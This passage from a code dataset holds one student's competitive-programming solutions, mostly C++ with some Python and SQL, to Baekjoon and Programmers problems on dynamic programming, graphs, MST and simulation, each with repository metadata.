"2037299183fdc0ec4ee230242b90073acdf65cde", "content_id": "6d969e199330fb7a0d14ecc50dcbf7ed68f0aaa2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1129, "license_type": "no_license", "max_line_length": 75, "num_lines": 50, "path": "/BOJ/Dynamic Programming/9252.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 9252번: LCS 2\nDATE: 2022-02-16\nDynamic Programming (Longest Common Subsequence)\n*/\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nint dp[1001][1001];\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n string str1, str2;\n cin >> str1 >> str2;\n\n for(int i = 1 ; i <= str2.length() ; i++){\n for(int j = 1 ; j <= str1.length() ; j++){\n if(str2[i - 1] == str1[j - 1]) dp[i][j] = dp[i - 1][j - 1] + 1;\n else dp[i][j] = max(dp[i - 1][j] , dp[i][j - 1]);\n }\n }\n\n int length = dp[str2.length()][str1.length()];\n cout << length << '\\n';\n\n if(length == 0) return 0;\n \n char ans[length];\n int i = str2.length(), j = str1.length();\n int idx = 0, num = length;\n\n while(1){\n if(num == 0) break;\n\n if(num == dp[i][j - 1]) j--;\n else if(num == dp[i - 1][j]) i--;\n else {\n ans[idx++] = str1[j - 1];\n num = dp[i - 1][j - 1];\n i--; \n j--;\n }\n }\n\n reverse(ans, ans + length);\n for(int i = 0 ; i < length ; i++) cout << ans[i];\n\n return 0;\n}" }, { "alpha_fraction": 0.4708029329776764, "alphanum_fraction": 0.5054744482040405, "avg_line_length": 20.115385055541992, "blob_id": "b7ee071af63d6675692a5ba32c8c8b47f3f7a792", "content_id": "9c63d38aa7cbbd0df70a9809d0d1aa276819293c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 560, "license_type": "no_license", "max_line_length": 86, "num_lines": 26, "path": "/programmers/Level 2/english_shiritori.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 2: 영어 끝말잇기\nDATE: 2022-06-14\n*/\n#include <string>\n#include <vector>\n#include <iostream>\n#include <map>\nusing namespace std;\n\nvector<int> solution(int n, vector<string> words) {\n vector<int> answer(2, 0);\n map<string, int> word;\n\n for(int i = 0 ; i < words.size() ; i++){\n if(word[words[i]] > 0 || (i > 0 && words[i - 1].back() != words[i].front())) {\n answer[0] = i % n + 1;\n answer[1] = i / n + 1;\n break;\n }\n \n word[words[i]]++;\n }\n\n return answer;\n}" }, { "alpha_fraction": 0.3958539068698883, "alphanum_fraction": 0.45607107877731323, "avg_line_length": 22.581396102905273, "blob_id": "16a086e3fd78e97555798c4423f493a8aa1cffe3", "content_id": "a0cda88e76dbbf61b0e6b5096639d4957e31e4ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1013, "license_type": "no_license", "max_line_length": 94, "num_lines": 43, "path": "/programmers/Level 1/crane_doll_draw_game.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//programmers Level 1 : Crane doll draw game\n//2019 KAKAO Winter Internship\n//2021-05-07\n#include <string>\n#include <vector>\n#include <iostream>\n\nusing namespace std;\n\nint solution(vector<vector<int>> board, vector<int> moves) {\n int answer = 0;\n vector<int> v;\n \n for(int i = 0 ; i < moves.size() ; i++){\n for(int j = 0 ; j < board.size() ; j++){\n if(board[j][moves[i] - 1] > 0){\n v.push_back(board[j][moves[i] - 1]);\n board[j][moves[i] - 1] = 0;\n break;\n }\n } \n }\n \n for(int i = 0 ; i < v.size() ; i++){\n if(v[i] == v[i - 1]){\n answer += 2;\n v.erase(v.begin() + (i - 1) , v.begin() + (i + 1));\n i-=2;\n }\n }\n \n return answer;\n}\n\nint main(){\n vector<vector<int>> board = {{0,0,0,0,0},{0,0,1,0,3},{0,2,5,0,1},{4,2,4,4,2},{3,5,1,3,1}};\n vector<int> moves = {1,5,3,5,1,2,1,4};\n\n int num = solution(board, moves);\n cout << num;\n\n return 0;\n}" }, { "alpha_fraction": 0.40674155950546265, "alphanum_fraction": 0.449438214302063, "avg_line_length": 12.9375, "blob_id": "85ee0f357f3eedcef2476ab1cd3116a0efd34378", "content_id": "cb82b4710a7318f8d18f18d5c13d3c2bbd8c279c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 451, "license_type": "no_license", "max_line_length": 58, "num_lines": 32, "path": "/BOJ/Implementation/2161.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2161번: 카드1\n2021-03-30\n*/\n#include <iostream>\n#include <queue>\n\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n queue <int> q;\n\n int n;\n cin >> n;\n\n for(int i = 1 ; i <= n ; i++){\n q.push(i);\n }\n\n while(!(q.size() == 1)){\n cout << q.front() << \" \";\n q.pop();\n\n q.emplace(q.front()); \n q.pop();\n }\n\n cout << q.front();\n\n return 0;\n}" }, { "alpha_fraction": 0.48491379618644714, "alphanum_fraction": 0.5387930870056152, "avg_line_length": 17.600000381469727, "blob_id": "e265e134d823d7e3e5861b4d0c9e02d07cd3be2f", "content_id": "bd307f6a0588a1d5dc4d8c1599417824068ac7c5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 474, "license_type": "no_license", "max_line_length": 58, "num_lines": 25, "path": "/BOJ/Implementation/10818_2.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 10818번: 최소, 최대 \n2021-03-30\nmin, max ver\n*/\n#include <iostream>\n#include <algorithm>\n#define MAX 1000000\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, input, min_num = MAX, max_num = -MAX;\n cin >> n;\n\n for(int i = 0 ; i < n ; i++){\n cin >> input;\n min_num = min(min_num, input);\n max_num = max(max_num, input);\n }\n\n cout << min_num << \" \" << max_num;\n\n return 0;\n}" }, { "alpha_fraction": 0.3973214328289032, "alphanum_fraction": 0.4188988208770752, "avg_line_length": 17.943662643432617, "blob_id": "53a9975f7e40202dbe0b07e8a13d730967ddc5fe", "content_id": "ea638679ec7727a471555610c377ececd9509aee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1380, "license_type": "no_license", "max_line_length": 58, "num_lines": 71, "path": "/BOJ/Graph Theory/11437.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 11438번: LCA\nDATE: 2021-07-13\n*/\n#include <iostream>\n#include <vector>\n#include <queue>\n#define MAX 100001\nusing namespace std;\n\nvector<int> v[MAX];\nint depth[MAX], parent[MAX];\nint n, m;\n\nvoid bfs(int parentNode, int curDepth){\n queue<int> q;\n q.push(parentNode);\n\n while(!q.empty()){\n int qsize = q.size();\n for(int i = 0 ; i < qsize ; i++){\n int curNode = q.front();\n depth[curNode] = curDepth;\n q.pop();\n\n for(int nextNode : v[curNode]){\n if(depth[nextNode] == 0){\n parent[nextNode] = curNode;\n q.push(nextNode);\n }\n }\n }\n curDepth++;\n }\n\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int a, b;\n cin >> n;\n \n for(int i = 1 ; i < n ; i++){\n cin >> a >> b;\n v[a].push_back(b);\n v[b].push_back(a);\n }\n\n bfs(1, 1);\n\n cin >> m;\n\n for(int i = 0 ; i < m ; i++){\n cin >> a >> b;\n\n //a의 레벨 > b의 레벨\n if(depth[a] < depth[b]) swap(a, b);\n \n while(depth[a] != depth[b]) {\n a = parent[a]; //레벨이 같아질 때까지 갱신\n }\n while(a != b){\n a = parent[a];\n b = parent[b]; \n }\n\n cout << b << '\\n';\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.426858514547348, "alphanum_fraction": 0.5179855823516846, "avg_line_length": 13.928571701049805, "blob_id": "05c4543f8183fe768929700f65736c38d6a5c362", "content_id": "021ff82f6b6c3b56abe6bff4f61e775d162f12c7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 423, "license_type": "no_license", "max_line_length": 58, "num_lines": 28, "path": "/BOJ/Dynamic Programming/1904.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1904번: 01타일\nDATE: 2021-05-28\nDynamic programming\n*/\n#include <iostream>\n#define MOD 15746\n#define MAX 1000001\nusing namespace std;\n\nlong long dp[MAX] = {0,};\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n;\n cin >> n;\n\n dp[1] = 1;\n dp[2] = 2;\n\n for(int i = 3 ; i <= n ; i++){\n dp[i] = (dp[i - 2] + dp[i - 1]) % MOD;\n }\n\n cout << dp[n];\n\n return 0;\n}" }, { "alpha_fraction": 0.4681440591812134, "alphanum_fraction": 0.5235456824302673, "avg_line_length": 15.454545021057129, "blob_id": "ada2079fba5224f2a90392dc1b29d8b194e9be03", "content_id": "6bedca41feaeb6170d445d89f2b5d25085257da6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 367, "license_type": "no_license", "max_line_length": 58, "num_lines": 22, "path": "/BOJ/Implementation/10817.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//BOJ 10817번: 세 수\n//2021-05-04\n#include <iostream>\n#include <algorithm>\n#include <vector>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n;\n vector<int> v;\n\n for(int i = 0 ; i < 3 ; i++){\n cin >> n;\n v.push_back(n);\n }\n\n sort(v.begin(), v.end());\n cout << v[1];\n\n return 0;\n}" }, { "alpha_fraction": 0.440443217754364, "alphanum_fraction": 0.4764542877674103, "avg_line_length": 19.11111068725586, "blob_id": "64d9598ec5622330ad19c3fbced3d2290ebb0eb0", "content_id": "c588e35a01fc4b301637539a0ad7f7c272a15922", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 377, "license_type": "no_license", "max_line_length": 38, "num_lines": 18, "path": "/programmers/Level 1/incomplete_player.py", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "# programmers Level 1: 완주하지 못한 선수\n# date: 2022-04-15\ndef solution(participant, completion):\n answer = ''\n dic = {}\n \n for x in participant:\n dic[x] = dic.get(x, 0) + 1\n \n for x in completion:\n dic[x] -= 1\n \n for k, v in dic.items():\n if v == 1:\n answer = k\n break\n \n return answer" }, { "alpha_fraction": 0.486679345369339, "alphanum_fraction": 0.5099905133247375, "avg_line_length": 22.10988998413086, "blob_id": "44b6b144e47271dab9cfafb02e30fa13a0370d38", "content_id": "cba1910d35a385179ad41be766338fbfd5bab0c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2156, "license_type": "no_license", "max_line_length": 82, "num_lines": 91, "path": "/programmers/Level 2/parking_fee_calculation.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 2: 주차 요금 계산\n2022 KAKAO BLIND RECRUITMENT\nDATE: 2022-04-02\n*/\n#include <string>\n#include <vector>\n#include <map>\n#include <sstream>\n#include <algorithm>\n#include <cmath>\nusing namespace std;\n\nvector<string> split(string str, char del){\n vector<string> ret;\n istringstream iss(str);\n string buffer;\n \n while(getline(iss, buffer, del)) ret.push_back(buffer);\n \n return ret;\n}\n\nint calcTime(string in, string out){\n int idx, time = 0;\n \n idx = in.find(':');\n int in_hour = stoi(in.substr(0, idx));\n int in_min = stoi(in.substr(idx + 1));\n \n idx = out.find(':');\n int out_hour = stoi(out.substr(0, idx));\n int out_min = stoi(out.substr(idx + 1));\n \n if(in_min > out_min){\n time += 60 - in_min + out_min;\n time += (out_hour - in_hour - 1) * 60;\n }\n else{\n time += out_min - in_min;\n time += (out_hour - in_hour) * 60;\n }\n \n return time;\n}\n\nvector<int> solution(vector<int> fees, vector<string> records) {\n vector<int> answer;\n map<string, string> m1;\n map<string, int> m2;\n \n for(auto i : records){\n vector<string> ret = split(i, ' ');\n string car = ret[1];\n \n if(m1.find(car) != m1.end()){\n int time = calcTime(m1[car], ret[0]);\n \n m2[car] += time;\n m1.erase(car);\n } \n else m1[car] = ret[0]; \n }\n \n for(auto i : m1) { // 입차 기록은 존재하는데 출차 기록이 없는 차들 계산\n string car = i.first;\n string in = i.second;\n string out = \"23:59\";\n \n int time = calcTime(in, out);\n m2[car] += time;\n }\n\n vector<pair<string, int>> tmp;\n\n for(auto i : m2){\n string car = i.first;\n int total = i.second;\n\n if(total <= fees[0]) tmp.push_back({car, fees[1]});\n else{\n int fee = fees[1] + ceil(double(total - fees[0]) / fees[2]) * fees[3];\n tmp.push_back({car, fee});\n }\n }\n \n sort(tmp.begin(), tmp.end());\n for(auto i : tmp) answer.push_back(i.second);\n \n return answer;\n}" }, { "alpha_fraction": 0.6355311274528503, "alphanum_fraction": 0.6849817037582397, "avg_line_length": 17.827587127685547, "blob_id": "6c1b95791ffb5844b7334560701cd31c0c4cf11f", "content_id": "0ba6fc02748e8084178eb7bb26f5b4333cbb3452", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 598, "license_type": "no_license", "max_line_length": 91, "num_lines": 29, "path": "/programmers/SQL/IS NULL.md", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "# IS NULL\n\n**[1. 이름이 없는 동물의 아이디 (Level 1)](https://programmers.co.kr/learn/courses/30/lessons/59039)**\n\n```sql\nSELECT ANIMAL_ID\nFROM ANIMAL_INS\nWHERE NAME IS NULL\n```\n\n<br/>\n\n**[2. 이름이 있는 동물의 아이디 (Level 1)](https://programmers.co.kr/learn/courses/30/lessons/59407)**\n\n```sql\nSELECT ANIMAL_ID\nFROM ANIMAL_INS\nWHERE NAME IS NOT NULL\n```\n\n<br/>\n\n**[3. NULL 처리하기 (Level 2)](https://programmers.co.kr/learn/courses/30/lessons/59410)**\n\n```sql\nSELECT ANIMAL_TYPE, IFNULL(NAME, 'No name') AS NAME, SEX_UPON_INTAKE\nFROM ANIMAL_INS\nORDER BY ANIMAL_ID\n```\n" }, { "alpha_fraction": 0.5125628113746643, "alphanum_fraction": 0.5427135825157166, "avg_line_length": 16.08571434020996, "blob_id": "ab72bd1760a2b00771075eea0cd3d4a60d8d85a9", "content_id": "5fdb35e0b0b6ac0f0f478d35450e5750bf2f5038", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 603, "license_type": "no_license", "max_line_length": 58, "num_lines": 35, "path": "/BOJ/Implementation/2503.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2503번: 카드\nDATE: 2022-03-11\n*/\n#include <iostream>\n#include <map>\n#include <vector>\n#include <algorithm>\n#define ll long long\nusing namespace std;\n\nmap<ll, ll> m;\n\nbool cmp(pair<ll,ll> a, pair<ll,ll> b){\n if(a.second == b.second) return a.first < b.first;\n return a.second > b.second;\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n ll n, a;\n cin >> n;\n\n for(int i = 0 ; i < n ; i++){\n cin >> a;\n m[a]++;\n }\n\n vector<pair<ll,ll>> v(m.begin(), m.end());\n sort(v.begin(), v.end(), cmp);\n\n cout << v[0].first;\n\n return 0;\n}" }, { "alpha_fraction": 0.39282429218292236, "alphanum_fraction": 0.4351426064968109, "avg_line_length": 19.923076629638672, "blob_id": "4af821d581c24ae5e9717fda2ed02817845a4d17", "content_id": "8a8d819fd9bf77f4b7ea7a0e2405d6346ca364a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1275, "license_type": "no_license", "max_line_length": 83, "num_lines": 52, "path": "/BOJ/Divide And Conquer/1992.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1992번: 쿼드트리\nDATE: 2022-02-14\nDivide And Conquer\n-\n0. 인자로 받은 (x, y)의 숫자로 체크함\n1. 해당 범위의 모든 수가 동일 => 숫자 출력\n2. 다른 수가 존재한다면 => 4등분해서 재귀\n 2-1. 재귀 전 여는 괄호, 끝난 후 닫는 괄호\n 2-2. 순서: 왼쪽 위 -> 오른쪽 위 -> 왼쪽 아래 -> 오른쪽 아래\n*/\n#include <iostream>\n#define MAX 64\nusing namespace std;\n\nint n;\nint arr[MAX][MAX];\n\nvoid solve(int size, int r, int c){\n int check = arr[r][c];\n int dr[4] = {0, 0, size / 2, size / 2};\n int dc[4] = {0, size / 2, 0, size / 2};\n\n for(int i = r ; i < r + size ; i++){\n for(int j = c ; j < c + size ; j++){\n if(arr[i][j] != check){\n printf(\"(\");\n for(int k = 0 ; k < 4 ; k++) solve(size / 2, r + dr[k], c + dc[k]);\n printf(\")\");\n\n return;\n }\n }\n }\n\n printf(\"%d\", check); // 해당 범위가 0 또는 1로만 이루어진 경우\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n scanf(\"%d\", &n);\n\n for(int i = 0 ; i < n ; i++){\n for(int j = 0 ; j < n ; j++){\n scanf(\"%1d\", &arr[i][j]);\n }\n }\n\n solve(n, 0, 0);\n\n return 0;\n}" }, { "alpha_fraction": 0.4931506812572479, "alphanum_fraction": 0.521268904209137, "avg_line_length": 22.133333206176758, "blob_id": "da8cbf673c076115a642c5aa726562a9eda687e0", "content_id": "fabe5058e029e540ca0632e2f2dac05650cb265e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1405, "license_type": "no_license", "max_line_length": 94, "num_lines": 60, "path": "/BOJ/Dijkstra/13549_2.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 13549번: 숨바꼭질 3\n2022-01-12\nDijkstra Algorithm ver.\n*/\n#include <iostream>\n#include <vector>\n#include <queue>\n#include <algorithm>\n#define MAX 100001\n#define INF 1e9\nusing namespace std;\n\nvector<pair<int,int>> graph[MAX];\nint sec[MAX];\nint mv[3] = {-1, 1, 2};\n\nvoid dijkstra(int start){\n priority_queue<pair<int,int>, vector<pair<int,int>>, greater<pair<int,int>>> pq; // 시간, 위치\n \n pq.push({0, start});\n sec[start] = 0;\n\n while(!pq.empty()){\n int curTime = pq.top().first;\n int curLocation = pq.top().second;\n int nextLocation, nextTime;\n pq.pop();\n\n if(curTime > sec[curLocation]) continue;\n for(int i = 0 ; i < 3 ; i++) {\n if(i < 2) {\n nextLocation = curLocation + mv[i];\n nextTime = sec[curLocation] + 1;\n }\n else {\n nextLocation = curLocation * 2;\n nextTime = sec[curLocation];\n }\n\n if(nextLocation < 0 || nextLocation > MAX - 1) continue;\n if(sec[nextLocation] > nextTime) {\n sec[nextLocation] = nextTime;\n pq.push({nextTime, nextLocation});\n }\n }\n }\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, k;\n cin >> n >> k;\n\n fill(sec, sec + MAX, INF);\n dijkstra(n);\n cout << sec[k];\n\n return 0;\n}" }, { "alpha_fraction": 0.36186420917510986, "alphanum_fraction": 0.38449472188949585, "avg_line_length": 21.89230728149414, "blob_id": "7fce27d10e27569220cf9af2876f771820e2e123", "content_id": "6c070943d1b3f283f944d42273e097bbb162182d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4505, "license_type": "no_license", "max_line_length": 65, "num_lines": 195, "path": "/BOJ/Implementation/3425.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 3452번: 고스택\nDATE: 2021-07-06\n*/\n#include <iostream>\n#include <vector>\n#define MAX 1000000000\n#define MIN -1000000000\nusing namespace std;\n\nvector<long long> stk, num;\nvector<string> command;\nlong long n;\n\nbool program()\n{\n int cnt = 0;\n\n //명령어 실행\n for (int i = 0; i < command.size(); i++)\n {\n if (command[i] == \"NUM\")\n {\n // num 벡터에 있는 값 사용\n stk.push_back(num[cnt++]);\n }\n else if (command[i] == \"POP\")\n {\n if (stk.size() < 1) return false;\n stk.pop_back();\n }\n else if (command[i] == \"INV\")\n {\n if (stk.size() < 1) return false;\n\n long long tmp = stk.back();\n tmp = -tmp;\n\n stk.pop_back();\n stk.push_back(tmp);\n }\n else if (command[i] == \"DUP\")\n {\n if (stk.size() < 1) return false;\n stk.push_back(stk.back());\n }\n else if (command[i] == \"SWP\")\n {\n if (stk.size() < 2) return false;\n\n long long tmp1 = stk.back();\n stk.pop_back();\n long long tmp2 = stk.back();\n stk.pop_back();\n\n stk.push_back(tmp1);\n stk.push_back(tmp2);\n }\n else if (command[i] == \"ADD\")\n {\n if (stk.size() < 2) return false;\n\n long long tmp1 = stk.back();\n stk.pop_back();\n long long tmp2 = stk.back();\n stk.pop_back();\n\n long long num = tmp1 + tmp2;\n if (num > MAX || num < MIN) return false;\n else stk.push_back(num);\n }\n else if (command[i] == \"SUB\")\n {\n if (stk.size() < 2) return false;\n\n long long tmp1 = stk.back();\n stk.pop_back();\n long long tmp2 = stk.back();\n stk.pop_back();\n\n long long num = tmp2 - tmp1;\n if (num > MAX || num < MIN) return false;\n else stk.push_back(num);\n }\n else if (command[i] == \"MUL\")\n {\n if (stk.size() < 2) return false;\n\n long long tmp1 = stk.back();\n stk.pop_back();\n long long tmp2 = stk.back();\n stk.pop_back();\n\n long long num = tmp1 * tmp2;\n if (num > MAX || num < MIN) return false;\n else stk.push_back(num);\n }\n else if (command[i] == \"DIV\")\n {\n if (stk.size() < 2) return false;\n\n long long tmp1, tmp2, num;\n tmp1 = stk.back();\n stk.pop_back();\n tmp2 = stk.back();\n stk.pop_back();\n\n if (tmp1 == 0) return false;\n\n if ((tmp1 > 0 && tmp2 > 0) || (tmp1 < 0 && tmp2 < 0))\n num = tmp2 / tmp1;\n else\n { //음수 한개\n num = abs(tmp2) / abs(tmp1);\n num = -num;\n }\n\n stk.push_back(num);\n }\n else if (command[i] == \"MOD\")\n {\n if (stk.size() < 2) return false;\n\n long long tmp1, tmp2, num;\n tmp1 = stk.back();\n stk.pop_back();\n tmp2 = stk.back();\n stk.pop_back();\n\n if (tmp1 == 0)\n return false;\n\n if (tmp2 < 0)\n {\n num = abs(tmp2) % tmp1;\n num = -num;\n }\n else if (tmp2 > 0)\n {\n num = tmp2 % tmp1;\n }\n\n stk.push_back(num);\n }\n }\n\n return true;\n}\n\nint main()\n{\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n\n while (1)\n {\n string str;\n command.clear();\n num.clear();\n\n while (1)\n {\n cin >> str;\n if (str == \"END\") break;\n else if (str == \"QUIT\") return 0;\n else if (str == \"NUM\")\n {\n int a;\n cin >> a;\n command.push_back(str);\n num.push_back(a);\n }\n else\n command.push_back(str);\n }\n\n cin >> n;\n \n for (int i = 0; i < n; i++)\n {\n int input;\n cin >> input;\n\n stk.clear();\n stk.push_back(input);\n\n if (!program() || stk.size() != 1)\n cout << \"ERROR\\n\";\n else\n cout << stk[0] << '\\n';\n }\n cout << '\\n';\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.38449999690055847, "alphanum_fraction": 0.4074999988079071, "avg_line_length": 22, "blob_id": "a7e571b8e5de2bb7ece58be10f379e098d140f66", "content_id": "04fc6bbd89b6129304ee2a5f78c8b612fb9c4ea9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2130, "license_type": "no_license", "max_line_length": 71, "num_lines": 87, "path": "/BOJ/Implementation/15686.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 15686번: 치킨 배달\nDATE: 2021-04-17\n*/\n#include <iostream>\n#include <vector>\n#include <queue>\n#include <cstdlib>\nusing namespace std;\n\nvector<pair<int, int>> cv; //치킨집\nvector<pair<int, int>> hv; //집\npair<int, int> p[13]; //조합한 치킨집\npriority_queue<int, vector<int>, greater<int>> pq;\nint city[51][51];\nint n, m, dst, new_dst, c_dst;\n\nvoid combination(int depth, int next){ //순서X, 중복X\n if(depth == m){ //치킨거리 구하기\n c_dst = 0;\n \n for(int i = 0 ; i < hv.size() ; i++){\n int x = hv[i].first;\n int y = hv[i].second;\n dst = 100;\n \n for(int j = 0 ; j < m ; j++){\n new_dst = abs(x - p[j].first) + abs(y - p[j].second);\n dst = min(dst, new_dst);\n }\n c_dst += dst;\n }\n\n pq.push(c_dst);\n\n return;\n }\n\n for(int i = next ; i <= cv.size() ; i++){\n p[depth] = cv[i - 1];\n combination(depth + 1, i + 1);\n }\n}\n\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n cin >> n >> m;\n\n for(int i = 1 ; i <= n ; i++){\n for(int j = 1 ; j <= n ; j++){\n cin >> city[i][j];\n\n if(city[i][j] == 1) {\n hv.push_back(make_pair(i, j)); //집(1) 위치\n }\n else if(city[i][j] == 2){\n cv.push_back(make_pair(i, j)); //치킨집(2) 위치\n }\n }\n }\n\n if(m == cv.size()){ //바로 치킨 거리 구하기\n c_dst=0;\n\n for(int i = 0 ; i < hv.size() ; i++){\n int x = hv[i].first;\n int y = hv[i].second;\n dst = 100;\n \n for(int k = 0 ; k < cv.size() ; k++){\n new_dst = abs(x - cv[k].first) + abs(y - cv[k].second);\n dst = min(dst, new_dst);\n }\n\n c_dst += dst;\n }\n }\n else{ //치킨 가게가 최대 m개 있어야하는 경우: cv.size()개 중에 m개를 선택하는 조합 \n combination(0, 1);\n c_dst = pq.top();\n }\n\n cout << c_dst;\n\n return 0;\n}" }, { "alpha_fraction": 0.4762253165245056, "alphanum_fraction": 0.49890270829200745, "avg_line_length": 18, "blob_id": "c471533b4acca44711b7be092898010a2ee90018", "content_id": "d719a1699f76782532e8c682f4456ea73e0ffe96", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1383, "license_type": "no_license", "max_line_length": 58, "num_lines": 72, "path": "/BOJ/MST/14621.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 14621번: 나만 안되는 연애\nDATE: 2022-03-03\nKruskal Algorithm\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\n#define MAX 1001\nusing namespace std;\n\nchar gender[MAX];\nvector<pair<int, pair<int,int>>> edge;\nint parent[MAX];\n\nint getParent(int x){\n if(x == parent[x]) return x;\n return parent[x] = getParent(parent[x]);\n}\n\nint findParent(int a, int b){\n a = getParent(a);\n b = getParent(b);\n\n if(a == b) return 1;\n else return 0;\n}\n\nvoid unionParent(int a, int b){\n a = getParent(a);\n b = getParent(b);\n\n if(a < b) parent[b] = a;\n else parent[a] = b;\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, m, ans = 0, cnt = 0;\n int a, b, c;\n char ch;\n\n cin >> n >> m;\n \n for(int i = 1 ; i <= n ; i++) cin >> gender[i];\n\n for(int i = 0 ; i < m ; i++){\n cin >> a >> b >> c;\n edge.push_back({c, {a, b}});\n }\n\n sort(edge.begin(), edge.end());\n\n for(int i = 1 ; i <= n ; i++) parent[i] = i;\n\n for(int i = 0 ; i < edge.size() ; i++){\n int x = edge[i].second.first;\n int y = edge[i].second.second;\n int z = edge[i].first;\n\n if(gender[x] != gender[y] && !findParent(x, y)){\n unionParent(x, y);\n ans += z;\n cnt++;\n }\n }\n\n if(cnt < n - 1) cout << -1;\n else cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.3427331745624542, "alphanum_fraction": 0.36616051197052, "avg_line_length": 24.065217971801758, "blob_id": "0387f6e6a84f2ba88b16253982e25559d7c84d3a", "content_id": "b93959f694032cf12bf0eaca674785064e7fca04", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2381, "license_type": "no_license", "max_line_length": 71, "num_lines": 92, "path": "/BOJ/Brute Force/7490.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 7490번: 0 만들기\n2021-12-20\nBrute force ver.\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nvector<string> ans;\nint input, n, r;\nint dpArr[8] = {0,};\n\nvoid duplicatePermutation(int depth) {\n if(depth == r) { // 0: 더하기 1: 빼기 2: 붙이기\n int sum = 0, cnt = 0;\n string calc = \"1\", origin = \"1\", tmp;\n\n for(int i = 1 ; i <= r ; i++) {\n if(dpArr[i - 1] == 0) {\n tmp = \"+\" + to_string(i + 1);\n calc += tmp; origin += tmp;\n }\n else if(dpArr[i - 1] == 1) {\n tmp = \"-\" + to_string(i + 1);\n calc += tmp; origin += tmp;\n }\n else {\n calc += to_string(i + 1);\n origin += \" \" + to_string(i + 1);\n }\n }\n\n for(int i = 0 ; i < calc.length() ; i++) {\n tmp.clear();\n cnt = 0;\n\n if(isdigit(calc[i])) {\n while(isdigit(calc[i])){\n tmp += calc[i++];\n cnt++;\n }\n \n i--;\n\n if(cnt == 1) {\n if(calc[i - cnt] == '+') sum += calc[i] - '0';\n else if(calc[i - cnt] == '-') sum -= calc[i] - '0';\n else sum = calc[i] - '0';\n }\n else if(cnt > 1) {\n if(calc[i - cnt] == '+') sum += stoi(tmp);\n else if(calc[i - cnt] == '-') sum -= stoi(tmp);\n else sum = stoi(tmp);\n }\n }\n }\n\n if(sum == 0) ans.push_back(origin);\n return;\n }\n\n for(int i = 1 ; i <= n ; i++) {\n dpArr[depth] = i - 1;\n duplicatePermutation(depth + 1);\n }\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0); \n int 